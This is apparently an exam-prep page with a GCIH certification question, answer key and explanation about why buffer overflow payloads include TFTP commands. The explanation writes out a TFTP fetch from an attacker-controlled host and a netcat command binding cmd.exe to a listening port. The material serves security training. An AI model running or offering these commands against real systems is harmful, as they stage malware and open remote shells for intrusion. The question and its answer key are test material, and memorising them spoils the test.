GCIH Question #615: Real Exam Question with Answer & Explanation
Correct answer: B. To retrieve a malicious executable from the attacker's system.
Vulnerability Exploitation & Privilege Escalation
Question
What purpose would an attacker have for including TFTP commands in the payload of a buffer overflow exploit?
Options
- A. To run a brute force attack against the victim's administrator password
- B. To retrieve a malicious executable from the attacker's system
- C. To launch a port scan against the victim's internal network
- D. To disable the victim's anti-virus and security software
Explanation
If an attacker discovers a buffer overflow that he or she can trigger remotely, the attacker could overflow the buffer and have it execute the following commands:
TFTP Remote_IPaddress (another machine the attacker controls)
nc -l -p 8080 (or any other port the attacker can reach) -e cmd.exe
The TFTP command is the retrieval step: it pulls a tool such as nc from the attacker-controlled host onto the victim, and the second command then runs that downloaded tool, which is why TFTP appears in the payload.
Topics
#TFTP #buffer overflow payload #malware download #exploit staging